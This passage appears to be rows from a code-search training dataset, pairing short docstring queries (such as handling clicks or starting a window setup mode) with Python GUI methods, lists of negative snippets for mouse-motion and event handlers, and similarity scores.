self.IVpltw.getPlotItem().clear()\n self.IVpltw.getPlotItem().addItem(pdi, clear=True)\n # self.IVpltw.show()", "def motion(self, event):\n dx = event.x - self.dragx\n dy = event.y - self.dragy\n\n self.dragx = event.x\n self.dragy = event.y\n\n self.canvas.move(self.tags, dx, dy)\n self.diag.update_arrows()", "def update(self):\r\n self.x = 60\r\n self.y = games.mouse.y\r\n self.check_collide()", "def handle_mousemotion(self, change):\r\n if widget.Widget.handle_mousemotion(self, change):\r\n app.App.handle_mousemotion(self, change)\r\n return True\r\n return False", "def mouseMoveEvent(self, e):\n if e.pos().y() == self._offset:\n return\n adder = (self._offset - e.y())\n self.deltacount += adder\n adder *= (abs(adder) * 0.01)\n f = self._max[0] - self._min[0]\n self._state[0] = min(self._max[0], max(self._min[0], self._state[0] + (adder * f / 1000.0)))\n self._param.update()\n QtGui.QCursor.setPos(self._origo)", "def OnMotion(self, event):\r\n\r\n pos = event.GetPosition()\r\n\r\n # check if the mouse is hovering above a button\r\n\r\n button = self.ButtonHitTest(pos.x, pos.y)\r\n wnd = self.TabHitTest(pos.x, pos.y)\r\n\r\n if wnd is not None:\r\n mouse_tab = self.GetIdxFromWindow(wnd)\r\n if not self._pages[mouse_tab].enabled:\r\n self._hover_button = None\r\n return\r\n\r\n if self._on_button:\r\n return\r\n \r\n if button:\r\n \r\n if self._hover_button and button != self._hover_button:\r\n self._hover_button.cur_state = AUI_BUTTON_STATE_NORMAL\r\n self._hover_button = None\r\n self.Refresh()\r\n self.Update()\r\n \r\n if button.cur_state != AUI_BUTTON_STATE_HOVER:\r\n button.cur_state = AUI_BUTTON_STATE_HOVER\r\n self.Refresh()\r\n self.Update()\r\n self._hover_button = button\r\n return\r\n \r\n else:\r\n \r\n if self._hover_button:\r\n self._hover_button.cur_state = AUI_BUTTON_STATE_NORMAL\r\n self._hover_button = None\r\n self.Refresh()\r\n self.Update()\r\n\r\n if not event.LeftIsDown() or self._click_pt == wx.Point(-1, -1):\r\n return\r\n\r\n if not self.HasCapture():\r\n return\r\n \r\n wnd = self.TabHitTest(pos.x, pos.y)\r\n\r\n if not self._is_dragging:\r\n\r\n drag_x_threshold = wx.SystemSettings.GetMetric(wx.SYS_DRAG_X)\r\n drag_y_threshold = wx.SystemSettings.GetMetric(wx.SYS_DRAG_Y)\r\n\r\n if abs(pos.x - self._click_pt.x) > drag_x_threshold or \\\r\n abs(pos.y - self._click_pt.y) > drag_y_threshold:\r\n\r\n self._is_dragging = True\r\n\r\n if self._drag_image:\r\n self._drag_image.EndDrag()\r\n del self._drag_image\r\n self._drag_image = None\r\n\r\n if self._agwFlags & AUI_NB_DRAW_DND_TAB:\r\n # Create the custom draw image from the icons and the text of the item\r\n mouse_tab = self.GetIdxFromWindow(wnd)\r\n page = self._pages[mouse_tab]\r\n tab_button = self._tab_close_buttons[mouse_tab]\r\n self._drag_image = TabDragImage(self, page, tab_button.cur_state, self._art)\r\n\r\n if self._agwFlags & AUI_NB_TAB_FLOAT:\r\n self._drag_image.BeginDrag(wx.Point(0,0), self, fullScreen=True)\r\n else:\r\n self._drag_image.BeginDragBounded(wx.Point(0,0), self, self.GetParent())\r\n\r\n # Capture the mouse cursor position offset relative to\r\n # The tab image location\r\n self._drag_img_offset = (pos[0] - page.rect.x,\r\n pos[1] - page.rect.y)\r\n\r\n self._drag_image.Show()\r\n\r\n if not wnd:\r\n evt2 = AuiNotebookEvent(wxEVT_COMMAND_AUINOTEBOOK_BEGIN_DRAG, self.GetId())\r\n evt2.SetSelection(self.GetIdxFromWindow(self._click_tab))\r\n evt2.SetOldSelection(evt2.GetSelection())\r\n evt2.SetEventObject(self)\r\n self.GetEventHandler().ProcessEvent(evt2)\r\n if 
evt2.GetDispatched():\r\n return\r\n \r\n evt3 = AuiNotebookEvent(wxEVT_COMMAND_AUINOTEBOOK_DRAG_MOTION, self.GetId())\r\n evt3.SetSelection(self.GetIdxFromWindow(self._click_tab))\r\n evt3.SetOldSelection(evt3.GetSelection())\r\n evt3.SetEventObject(self)\r\n self.GetEventHandler().ProcessEvent(evt3)\r\n\r\n if self._drag_image:\r\n # Apply the drag images offset\r\n pos -= self._drag_img_offset\r\n self._drag_image.Move(pos)", "def updateNodeMove(self, mouseA, mouseB):\n for node in self.nodeMgr.selectedNodes:\n if node is not self.draggedNode and node in self.tempNodePositions.keys():\n editVec = Vec3(self.tempNodePositions[node] - mouseA)\n newPos = mouseB + editVec\n node.frame.setPos(render2d, newPos)\n self.nodeMgr.updateConnections()", "def ev_mousemotion(self, event: tcod.event.MouseMotion) -> T | None:", "def _onmove(self, event):\n\n # self._prev are deprecated but we still need to maintain it\n self._prev = self._get_data(event)\n\n v = event.xdata if self.direction == 'horizontal' else event.ydata\n if self.direction == 'horizontal':\n vpress = self._eventpress.xdata\n else:\n vpress = self._eventpress.ydata\n\n # move existing span\n # When \"dragging from anywhere\", `self._active_handle` is set to 'C'\n # (match notation used in the RectangleSelector)\n if self._active_handle == 'C' and self._extents_on_press is not None:\n vmin, vmax = self._extents_on_press\n dv = v - vpress\n vmin += dv\n vmax += dv\n\n # resize an existing shape\n elif self._active_handle and self._active_handle != 'C':\n vmin, vmax = self._extents_on_press\n if self._active_handle == 'min':\n vmin = v\n else:\n vmax = v\n # new shape\n else:\n # Don't create a new span if there is already one when\n # ignore_event_outside=True\n if self.ignore_event_outside and self._selection_completed:\n return\n vmin, vmax = vpress, v\n if vmin > vmax:\n vmin, vmax = vmax, vmin\n\n self.extents = vmin, vmax\n\n if self.onmove_callback is not None:\n self.onmove_callback(vmin, vmax)\n\n return False", "def move_start(event):\n nonlocal x, y\n x = event.x \n y = event.y\n window['cursor'] = utils.CURSORS['move_item']", "def update(self):\n self.rect.x += self.change_x\n self.rect.y += self.change_y" ]
[ "0.7725639", "0.75353", "0.7477627", "0.7465811", "0.7323981", "0.72936875", "0.7253632", "0.725092", "0.71977973", "0.71450245", "0.71029884", "0.71029884", "0.70396215", "0.7001727", "0.6984642", "0.6945438", "0.69439787", "0.6930062", "0.69186425", "0.6899531", "0.6893881", "0.6875705", "0.68618554", "0.68148744", "0.67940384", "0.6782933", "0.67663574", "0.6745291", "0.67323244", "0.6731975", "0.6713997", "0.6712254", "0.67094046", "0.67080474", "0.6691214", "0.6677952", "0.66754645", "0.6672091", "0.6668611", "0.66530585", "0.6651209", "0.6651209", "0.664306", "0.6638818", "0.6638016", "0.66333765", "0.6632337", "0.6628603", "0.66184014", "0.6614607", "0.66061693", "0.65945387", "0.65916026", "0.6591074", "0.6587661", "0.65816706", "0.65812093", "0.6575241", "0.65652364", "0.6562125", "0.6558429", "0.65558404", "0.65551883", "0.6554132", "0.6553645", "0.65525275", "0.6546365", "0.6546365", "0.65385735", "0.65174407", "0.6511257", "0.6486144", "0.6483288", "0.6478382", "0.6473332", "0.6458773", "0.6430925", "0.6408773", "0.64071774", "0.6405528", "0.6393178", "0.638827", "0.638589", "0.63844633", "0.63781476", "0.63778275", "0.63773596", "0.63748443", "0.63594365", "0.63583064", "0.635603", "0.63441914", "0.6324809", "0.6322336", "0.6303743", "0.63012123", "0.62980294", "0.62953234", "0.62913513", "0.62885433" ]
0.6727378
30
Responds to click or dwell actions
def click(self, pos):
    # Confirm the setup
    if (self.setup_type != None):
        self.start_setup(None)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def click(self):\r\n pass", "def on_dclick ( self, object ):\n pass", "def on_click(self) -> None:\n pass", "def click(self):\n self.dispatch['elementClick'] = self.clickJsFnc", "def on_click ( self, object ):\n pass", "def interact(self):\r\n pass", "def _do_action(self):\n pass", "def _do_action(self):\n pass", "def act(self):\n pass", "def on_right_click(self, client, game) -> None:\n pass", "def on_click(self, event):\n if self.click_job is not None:\n self.after_cancel(self.click_job)\n item = self.identify(\"item\", event.x, event.y)\n if item:\n self.click_job = self.after(200, self.clicked, item)\n return \"break\"", "def _press(self, event):", "def mouse_click(self,x,y,button,double_click):\n raise NotImplementedError(\"ERROR: Unimplemented function.\")", "def clickedAction(self, events):\n print(\"The {} button was clicked!\".format(self.imgname))", "def clickOverride():\n\n pass", "def take_action(self, *args, **kwargs):\r\n pass", "def click(self, agent):\n self.grab(agent)\n #eventlet.sleep(5)\n self.degrab(agent)", "def _click(self):\n self._touch = self.view.touch", "def on_click(self, x, y):\n self.menu_pointer.on_click(x, y)", "def action(self):\n pass", "def action(self):\n pass", "def act(self):\n raise NotImplementedError", "def onAction(*args):", "def onAction(*args):", "def onAction(*args):", "def onAction(*args):", "def onClick(*args):", "def onClick(*args):", "def onClick(*args):", "def onClick(*args):", "def act(self) -> None:\n pass", "def trigger(self, type, event):", "def on_click(self, x, y):\n mul_x, mul_y = self.multiplier\n off_x, off_y = self.offset\n x -= off_x\n x /= mul_x\n y -= off_y\n y /= mul_y\n for button in self.button_dict.values():\n button.check_click(x, y)", "def arduPusherClick(self, dummy = 0):\r\n self.ardu.write(chr(self.CLICK))", "def __on_click(self):\n if self.enable:\n self.__function_to_activate()", "def DoAction(self,event):\r\n selections = self.list.GetSelections()\r\n if not selections: return bell()\r\n itemDex = selections[0]\r\n item = self.items[itemDex]\r\n self.data.action(item)", "def ev_mousebuttondown(self, event: MouseButtonDown) -> None:", "def click_on_hero():\n mouseclick(coords_hero_button[0], coords_hero_button[1])", "def atomacclick(objecttoclick):\n try:\n objecttoclick.Press()\n #print \"clicked on : %s\" %objecttoclick\n except Exception as er:\n print \"Not able to click on: %s\" %objecttoclick", "def ev_MOUSEDOWN(self, event):", "def handle_event(self, event):", "def react_to_event(self):\n raise NotImplementedError()", "def HandButton(self, event):\n pass", "def on_click(self) -> None:\n self.cycle()", "def responder():\n pass", "def mainWebActions(self, **kwargs):\n # If the dictionary item value is the required opens the webpage\n if kwargs['button']=='docs':\n # Only 1 click at every 5 seconds\n self.docs_Button.setDown(True)\n QTimer.singleShot(5000, lambda: self.docs_Button.setDown(False))\n webbrowser.open('https://italorenan.gitbook.io/roc/')", "def tap():\n return \"I have clicked on the elements\"", "def Click(self):\n if self.function == None:\n return\n \n self.function()", "def handle_mouse_press(self, event):", "def ev_mousebuttondown(self, event: tcod.event.MouseButtonDown) -> T | None:", "def events(self):", "def __on_click(self, evt):\n if evt.button() == Qt.LeftButton:\n return self._on_left_click(evt)\n if evt.button() == Qt.RightButton:\n return self._on_right_click(evt)", "def click(self, mouse_pos):\n for button in self.enabled_buttons(): # type: Button\n if 
button.is_position_on_button(mouse_pos):\n self.sound.play_sound(self.click_sound)\n button.click()", "def select_action(self):\n pass", "def click(cls, user, link):\r\n pass", "def handle_event(self, event):\n if not self.can_afford:\n self.cant_afford_dialogue.handle_event(event)\n else:\n self.how_many_selector.handle_event(event)", "def choose_action(self):\r\n pass", "def _launch_click_through_dialog(self):\n text = \"The port test did not complete successfully. If you are certain that you really did forward the port and would like to continue anyway, you can do so.\\\n Otherwise, you may want to try again.\"\n self.controller.show_msgbox(text, title=\"Do You Really Want to Do That?\", cb=self._click_through_dialog_cb, buttons=(gtk.STOCK_CANCEL, 0, gtk.STOCK_OK, 1), width=300)", "def actions():\n pass", "def handle_event(self, event, window):\n pass", "def _do_action(self, handler: 'Handler') -> CanDo:\n pass", "def _handle_button_msg(self, _, content):\n self.debug = \"debug: \" + str(content)\n try:\n if content.get('event', '') == 'open':\n self.debug = \"debug-ope: \" + str(content)\n self.session_open(content.get('filename'))\n elif content.get('event', '') == 'close':\n self.debug = \"debug-clo: \" + str(content)\n self.session_close()\n else:\n raise Exception(\"command not implemented for \", str(content))\n except Exception as err:\n self.set_status(\"error\", str(err))", "def action_done(self):", "def double_click(self, *args):\n return _ida_hexrays.Hexrays_Hooks_double_click(self, *args)", "def on_event(self, event):", "def click(self) -> None:\n logging.info(f\"click element. {self.desc}\")\n js = f\"\"\"var elm = document.querySelectorAll(\"{self.css}\")[{self.index}];\n elm.style.border=\"2px solid red\";\n elm.click();\"\"\"\n self._execute_javascript(js)", "def _click(self):\n if hasattr(self.canvas[\"items\"][self.index], 'commandFunc'):\n self.canvas[\"items\"][self.index].commandFunc(None)", "def _action(self):\n pass", "def action(self, target, text):\n raise NotImplementedError", "def _on_dclick(self, object):\n if self.window is not None:\n self.window.edit(object)", "def click(self, element):\n element.click()", "def on_mouse_click(self, event):\n if not self.is_game_over:\n try:\n # i, j coordinates of the click event\n i = int(round(event.ydata))\n j = int(round(event.xdata))\n\n # Left button\n if event.button == 1 or event.button == 2:\n self.reveal(i, j)\n\n # Right button\n elif event.button == 3:\n self.flag(i, j)\n\n except (TypeError, IndexError):\n pass", "def right_click(self, *args):\n return _ida_hexrays.Hexrays_Hooks_right_click(self, *args)", "def on_click(self, event):\n if event['button'] == 1 and 'button1' in self.options:\n subprocess.call(self.options['button1'].split())\n elif event['button'] == 2 and 'button2' in self.options:\n subprocess.call(self.options['button2'].split())\n elif event['button'] == 3 and 'button3' in self.options:\n subprocess.call(self.options['button3'].split())", "def perform_action(self, action_data):\n pass", "def actions(self):\n raise NotImplementedError", "def act(self, state):\n return", "def OnAccept(self, event):\n pass", "def action(self, arg):\n\n print(arg)\n\n if arg[\"Type\"] == \"SoKeyboardEvent\" and arg[\"Key\"] == \"ESCAPE\":\n self.finish()\n\n elif arg[\"Type\"] == \"SoLocation2Event\":\n self.point, ctrlPoint, self.info = gui_tool_utils.getPoint(self, arg)\n gui_tool_utils.redraw3DView()\n\n elif (arg[\"Type\"] == \"SoMouseButtonEvent\" and\n arg[\"State\"] == \"DOWN\" and\n arg[\"Button\"] == 
\"BUTTON1\"):\n\n if arg[\"Position\"] == self.pos:\n return self.finish(False, cont=True)\n\n if (not self.node) and (not self.support):\n gui_tool_utils.getSupport(arg)\n self.point, ctrlPoint, self.info = gui_tool_utils.getPoint(self, arg)\n print(gui_tool_utils.getPoint(self, arg))\n\n if self.point:\n self.point = FreeCAD.Vector(self.info[\"x\"], self.info[\"y\"], self.info[\"z\"])\n self.ui.redraw()\n self.pos = arg[\"Position\"]\n self.node.append(self.point)\n self.drawSegment(self.point)\n if len(self.node) > 2:\n # The wire is closed\n if (self.point - self.node[0]).Length < utils.tolerance():\n self.undolast()\n if len(self.node) > 2:\n self.finish(True, cont=True)\n else:\n self.finish(False, cont=True)", "def action(self, arg):\n\n print(arg)\n\n if arg[\"Type\"] == \"SoKeyboardEvent\" and arg[\"Key\"] == \"ESCAPE\":\n self.finish()\n\n elif arg[\"Type\"] == \"SoLocation2Event\":\n self.point, ctrlPoint, self.info = gui_tool_utils.getPoint(self, arg)\n gui_tool_utils.redraw3DView()\n\n elif (arg[\"Type\"] == \"SoMouseButtonEvent\" and\n arg[\"State\"] == \"DOWN\" and\n arg[\"Button\"] == \"BUTTON1\"):\n\n if arg[\"Position\"] == self.pos:\n return self.finish(False, cont=True)\n\n if (not self.node) and (not self.support):\n gui_tool_utils.getSupport(arg)\n self.point, ctrlPoint, self.info = gui_tool_utils.getPoint(self, arg)\n print(gui_tool_utils.getPoint(self, arg))\n\n if self.point:\n self.point = FreeCAD.Vector(self.info[\"x\"], self.info[\"y\"], self.info[\"z\"])\n # self.ui.redraw()\n self.pos = arg[\"Position\"]\n self.node.append(self.point)\n self.drawSegment(self.point)\n if len(self.node) > 2:\n # The wire is closed\n if (self.point - self.node[0]).Length < utils.tolerance():\n self.undolast()\n if len(self.node) > 2:\n self.finish(True, cont=True)\n else:\n self.finish(False, cont=True)", "def RightClick(self):\n self._PressRightButton()\n self._ReleaseAllButtons()", "def click(cls, user, link):\n pass", "def on_click_return(self, event):\n self.on_click_callable(event[\"target\"])", "def clickDone(self):\n\n # Hide done button\n self.clickDone.place_forget()\n\n # Hide all ships and their names\n self.canvas.tag_lower('ship')\n self.canvas.tag_lower('text')\n self.canvas.tag_bind('square', '<Button-1>', self.fire)\n self.players.updateWidget()\n\n # If opponent is computer, unbind left-click trigger\n # This prevents user from left-clicking\n if game2.isComputer == 1:\n self.canvas.tag_unbind('square', '<Button-1>')\n self.players.frame1.title(\"%s's turn\" % self.players.usernames[1])\n self.players.frame2.title(\"%s's turn\" % self.players.usernames[0])\n showDialogBox(\"%s's turn first\" % self.players.usernames[0])", "def context_click(self, elem):\n ActionChains(self.driver).context_click(elem).perform()", "def doEvent(self, source):\n pass", "def action_run(self):\n pass", "def select_action(self, state):", "def on_mouse_press(self, x, y, button):\n\n pass", "def action(self,item):\r\n pass", "def play(self):\n self.accept(\"wheel_up\", self.scrollindex, [-1] )\n self.accept(\"wheel_down\", self.scrollindex, [1] )\n self.accept(\"arrow_up\", self.scrollindex, [-1] )\n self.accept(\"arrow_down\", self.scrollindex, [1] )\n self.accept(\"enter\", self._click)\n if callable(self.data['exit']): self.accept(\"escape\", self.data['exit'])\n for item in self.canvas[\"items\"]: item['state']=DGG.NORMAL", "def take_action(self, action):\n\t\traise NotImplementedError", "def fake_click(self, x, y):\n # Currently only restacks windows, and does not trigger bindings\n 
self.manager.c.eval(\n textwrap.dedent(\n f\"\"\"\n self.core.warp_pointer({x}, {y})\n self.core._focus_by_click()\n \"\"\"\n )\n )", "def act(self, ob_no):\n raise NotImplementedError", "def do_action(self):\n func = self._get_action_func()\n func(self)", "def choose_action(self, obs, **kwargs):\n pass", "def chooseAction(self):\n print \"nothing\"\n pass", "def click(self):\n element = self.element\n WebDriverWait(self._browser, TMO).until(\n lambda browser: element.is_displayed())\n time.sleep(0.1) # Just some pacing.\n element.click()", "def sense_and_act(self):\n pass", "def actions() -> None:\n pass", "def display(self):\n\t\tprint('The button in the window was clicked!')" ]
[ "0.7291359", "0.66233146", "0.660782", "0.65884537", "0.63273966", "0.62724835", "0.6255575", "0.6255575", "0.62212914", "0.61557615", "0.6118316", "0.61125875", "0.6065794", "0.6064975", "0.6038785", "0.599528", "0.59859943", "0.5957505", "0.59489393", "0.59387773", "0.59387773", "0.5929002", "0.5917446", "0.5917446", "0.5917446", "0.5917446", "0.5896101", "0.5896101", "0.5896101", "0.5896101", "0.5871146", "0.5870784", "0.58227426", "0.5807545", "0.5793374", "0.57836527", "0.5782985", "0.5768511", "0.5740707", "0.57318413", "0.57305324", "0.5728183", "0.5717806", "0.5715963", "0.57157016", "0.5714274", "0.57106197", "0.5710545", "0.57052296", "0.57051647", "0.5698197", "0.5686558", "0.5684432", "0.5676047", "0.5672097", "0.56656307", "0.56498784", "0.56371766", "0.5620025", "0.5613249", "0.5608101", "0.56000674", "0.5598441", "0.5584717", "0.55826014", "0.55754954", "0.55714244", "0.557027", "0.5566007", "0.5553893", "0.5551669", "0.5547545", "0.5537865", "0.55223477", "0.5521098", "0.55150205", "0.5513829", "0.5508528", "0.54981136", "0.5485925", "0.5475583", "0.54740304", "0.5460999", "0.54517573", "0.5445661", "0.54444236", "0.5442715", "0.5440428", "0.54398906", "0.5437513", "0.54212856", "0.5419304", "0.5414346", "0.5411164", "0.540765", "0.54033166", "0.53974706", "0.53973", "0.5393808", "0.5365337", "0.53591007" ]
0.0
-1
Respond to theme load ins here
def load_theme_values(self):
    pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def on_load_theme (self):\n\n\t\tif self.has_started:\n\t\t\tself.init_buffers()\n\t\t\tself.redraw_background()\n\t\t\tself.redraw_foreground()", "def on_load(self):\n pass", "def on_load(self):\n pass", "def onStartup(event):\n\n plugins = getPlugins()\n\n for themeDirectory in iterDirectoriesOfType(THEME_RESOURCE_NAME):\n if themeDirectory.directory in reload_paths: # only for sauna.reload!\n pluginSettings = getPluginSettings(themeDirectory, plugins)\n\n for name, plugin in plugins:\n plugin.onDiscovery(themeDirectory.__name__,\n pluginSettings[name],\n pluginSettings)", "def on_load(self):", "def dummy_loader(cls, context):\n log.warning(\"theme is not set -- add a theme value to your site settings\")\n theme_json = DEFAULT\n hasher = hashlib.md5()\n hasher.update(theme_json.encode(\"utf-8\"))\n theme_hash = hasher.hexdigest()\n\n theme_data = json.loads(theme_json)\n\n theme_data[\"_moya\"] = {\"path\": None, \"hash\": theme_hash}\n return theme_data", "def _post_load(self):\n pass", "def on_load(self):\n self.__init__()", "def handle_reload_toolbox(self):", "async def _theme_heist(self, ctx, theme):\r\n theme = theme.title()\r\n guild = ctx.guild\r\n\r\n if not os.path.exists(str(bundled_data_path(self)) + \"/{}.txt\".format(theme)):\r\n themes = [os.path.join(x).replace('.txt', '')\r\n for x in os.listdir(str(bundled_data_path(self))) if x.endswith(\".txt\")]\r\n msg = (\"I could not find a theme with that name. Available Themes:\"\r\n \"```\\n{}```\".format('\\n'.join(themes)))\r\n else:\r\n msg = await self.thief.theme_loader(guild, theme)\r\n\r\n await ctx.send(msg)", "def use_my_theme():\n # register and enable the theme\n alt.themes.register(\"my_theme\", my_theme)\n alt.themes.enable(\"my_theme\")", "def use_my_theme():\n # register and enable the theme\n alt.themes.register(\"my_theme\", my_theme)\n alt.themes.enable(\"my_theme\")", "def request_plugins(self):", "def on_startup(self) -> None:\n ...", "def postLoad(self):\n pass", "def refresh(self):\n self._themes = {}\n for theme in starchain(ldr(self.app) for ldr in self.loaders):\n if self.valid_app_id(theme.application):\n self.themes[theme.identifier] = theme\n self.register_theme_assets()", "def __init_on_load__(self):", "def on_init(self):\n self.write_log(\"策略初始化\")\n self.load_bar(1)", "def post_setup(self, context):\n pass", "def load(self):\n\n super().load()\n self.check_dcss()\n self.check_discord()", "def loader(cls, fs):\n\n def load(context=None):\n if context is None:\n context = pilot.context\n name = context.get(\".sys.site.theme\", \"default\")\n\n path = \"{}.json\".format(name)\n try:\n theme = cls.read(fs, path, context=context)\n except Exception as e:\n log.warning(\"unable to read theme file '%s' (%s)\", path, text_type(e))\n\n if name != \"default\":\n return load(\"default\")\n\n log.error(\"unable to load 'default' theme\")\n theme = None\n\n return theme\n\n return load", "def init_ui(self):\n self.parent.title(\"Roku Player Controller\")\n self.style.theme_use(\"default\")", "def packaged_themes_loader(app):\n themes_path = os.path.join(app.root_path, 'themes')\n if os.path.exists(themes_path):\n return load_themes_from(themes_path)\n else:\n return ()", "def on_init(self):\n self.write_log(\"策略初始化\")\n\n self.load_bar(10)", "def on_init(self):\n self.write_log(\"策略初始化\")\n self.load_bar(10)", "def on_init(self):\n self.write_log(\"策略初始化\")\n self.load_bar(10)", "def before_request():\r\n\r\n\tinit_classes()", "def plugin_loaded():\n events.broadcast(\"plugin_loaded\")", "def 
updateTheme(self):\n self.myUpdate(stateDict=None)", "def post_start(self):", "def on_start(self):\n self.init()", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def initialize(context):", "def on_init(self):\n self.write_log(\"策略初始化\")\n self.exchange_load_bar(self.exchange)", "def __macroLoad(self):\n self.activeWindow().macroLoad()", "def widget_load_config(self, plugman):\r\n pass", "def _post_hooks(self):", "def __init__(self, theme_dir):\n\n if not os.path.isdir(theme_dir): \n print(\"%s not a valid directory, please check!\" % theme_dir, file=sys.stderr)\n sys.exit(1)\n for dirname, dirnames, filenames in os.walk(theme_dir):\n for subdirname in dirnames:\n full_path = os.path.join(dirname, subdirname)\n self.theme_dir.append(full_path)\n print(\"read theme %s\" % full_path, file=sys.stdout)\n print(\"all themes loaded!\", file=sys.stdout)", "def onInit(self):\n pass", "def on_start(self, ctx):\n pass", "def force_load(self):\n pass", "def on_window_ready(self):\n pass", "def on_show_view(self):\n self.setup()", "def on_show_view(self):\n self.setup()", "def on_show_view(self):\n self.setup()", "def _hook(self):", "def load_site_if_needed(self):\n self.site.reload_if_needed()", "def setup_hooks(self):\n pass", "def run():\r\n autostartup()\r\n\r\n if settings.FEATURES.get('USE_CUSTOM_THEME', False):\r\n enable_theme()\r\n\r\n if settings.FEATURES.get('USE_MICROSITES', False):\r\n enable_microsites()\r\n\r\n if settings.FEATURES.get('ENABLE_THIRD_PARTY_AUTH', False):\r\n enable_third_party_auth()", "def template_loader(self):\n return None", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def ready(self):\n #Restart the service by loading static resources,\n #such as user dictionary\n #jieba.load_userdict(jieba_words_path)\n #jieba.analyse.set_stop_words(jieba_stop_words_path)\n pass", "def setup_theme(app):\r\n theme = app.config['THEME']\r\n app.template_folder = os.path.join('themes', theme, 'templates')\r\n app.static_folder = os.path.join('themes', theme, 'static')", "def prepare_UI(self):", "def OnStartup(cls, modName ):\r\n import sys\r\n targetMod = sys.modules[ modName ]\r\n cls.StartupVarsInjectToMod( targetMod )\r\n EasyIpyMagics.RegisterMagics()\r\n \r\n cls.RegisterPostExecute()", "async def _themelist_heist(self, ctx):\r\n themes = [os.path.join(x).replace('.txt', '')\r\n for x in os.listdir(str(bundled_data_path(self))) if x.endswith(\".txt\")]\r\n if len(themes) > 30:\r\n themes = themes[:30]\r\n await ctx.send(\"Available Themes:```\\n{}```\".format('\\n'.join(themes)))", "def on_start(self):", "def on_start(self):", "def _afterInit(self):\n pass", "def msg_app_init(self,msg):\r\n #load the main window layouts (in aui mixin class)\r\n self.frame.LoadLayouts()", "def prePresent(self, request):", "def loadTheme(self, name = \"default\"):\n themes = os.listdir(\"themes\")\n if name in themes:\n self.templates = {}\n files = 
glob.glob(\"themes/%s/*.tpl\" % name)\n for file in files:\n f = open(file)\n data = \"\\n\".join(f.readlines())\n f.close()\n\n key = file.replace(\".tpl\", \"\").split(os.path.sep)[-1]\n self.templates[key] = data", "def call(self, **kwargs):\n # Get additional resources links\n css = []\n for path in (\"creative/vendor/bootstrap/css/bootstrap.min.css\",\n \"creative/vendor/font-awesome/css/font-awesome.min.css\",\n \"creative/vendor/magnific-popup/magnific-popup.css\",\n \"creative/css/creative.css\"):\n css.append(self._cw.data_url(path))\n js = []\n for path in (\"creative/vendor/jquery/jquery.min.js\",\n \"creative/vendor/bootstrap/js/bootstrap.min.js\",\n \"creative/vendor/scrollreveal/scrollreveal.min.js\",\n \"creative/vendor/magnific-popup/jquery.magnific-popup.min.js\",\n \"creative/js/creative.js\"):\n js.append(self._cw.data_url(path))\n\n # Format template\n template = self._cw.vreg.template_env.get_template(\"startup.jinja2\")\n html = template.render(\n header_url=self._cw.data_url(\"creative/img/neurospin.jpg\"),\n login_url=self._cw.build_url(\n \"login\", __message=u\"Please login with your account.\"),\n contact_email=self._cw.vreg.config.get(\n \"administrator-emails\", \"noreply@cea.fr\"),\n css_url=css,\n js_url=js)\n self.w(html)", "def _post_init(self):\n pass", "def setHeader(object, event):\n\n request = event.request\n\n if isThemeEnabled(request):\n request.environ['HTTP_X_THEME_ENABLED'] = True", "def on_hook(self) -> None:", "def is_request_in_themed_site():\n # We need to give priority to theming/site-configuration over microsites\n return configuration_helpers.is_site_configuration_enabled()", "def includeme(config):\n config.add_subscriber(add_renderer_globals, BeforeRender)\n config.add_subscriber(add_localizer, NewRequest)\n config.add_subscriber(add_csrf_validation, NewRequest)\n config.add_subscriber(add_resources, NewRequest)", "def on_first_registration(self):\n self.main.tabify_plugins(self.main.help, self)\n self.dockwidget.hide()", "def pre_start(self) -> None:\n pass", "def plugin_loaded():\n # Required for sublime.packages_path().\n # ST only \"loads resources\" from the Packages dir.\n global _temp_path\n packages_path = sublime.packages_path()\n _temp_path = os.path.join(packages_path, _temp_dir_name)\n\n _remove_temp_path()", "def on_setup(self, request, trigger_context):\n raise NotImplementedError", "def on_run(self):\r\n\r\n\t\tpass", "def do_post_install(self, context):\n pass", "def load(self):\n self._really_load()", "def __init__(self,_dir,_theme='skyblue'):\n self.dir=_dir\n self.theme = _theme" ]
[ "0.68556285", "0.66520184", "0.66520184", "0.6610389", "0.64057696", "0.62862283", "0.61794144", "0.6151126", "0.6137831", "0.59524107", "0.59130126", "0.59130126", "0.5907942", "0.58921796", "0.58286834", "0.58206403", "0.57867295", "0.5769557", "0.576859", "0.5764957", "0.5720274", "0.5701185", "0.5699979", "0.56952167", "0.5665115", "0.5665115", "0.5621124", "0.5608668", "0.55465263", "0.5542513", "0.54998344", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.5487861", "0.54845905", "0.54710096", "0.5439414", "0.5433515", "0.54309165", "0.5415859", "0.53732824", "0.53657484", "0.5352102", "0.5347691", "0.5347691", "0.5347691", "0.53476447", "0.53388315", "0.53263646", "0.5299717", "0.5295351", "0.5293231", "0.5293231", "0.5293231", "0.5293231", "0.5293231", "0.5293231", "0.5293231", "0.5293231", "0.5270107", "0.52678543", "0.5260779", "0.52593684", "0.52437246", "0.5230329", "0.5230329", "0.5228736", "0.52254605", "0.5224555", "0.52210116", "0.5220132", "0.5213221", "0.5212543", "0.5203986", "0.51985514", "0.5182398", "0.51803684", "0.5179706", "0.51779217", "0.51762635", "0.517243", "0.51707774", "0.5169845", "0.5167688" ]
0.6718465
1
Starts a setup mode that is used for moving, resizing and other various changes that the user might setup
def start_setup(self, setup_type):
    # Persist the user preferences when we end our setup
    if (self.setup_type != "" and not setup_type):
        self.setup_type = setup_type
        rect = self.canvas.get_rect()
        self.x = int(rect.x)
        self.y = int(rect.y)
        self.width = int(rect.width)
        self.height = int(rect.height)
        self.preferences.persist_preferences({
            self.id + '_x': self.x,
            self.id + '_y': self.y,
            self.id + '_width': self.width,
            self.id + '_height': self.height
        })
    # Start the setup state
    elif self.setup_type != setup_type:
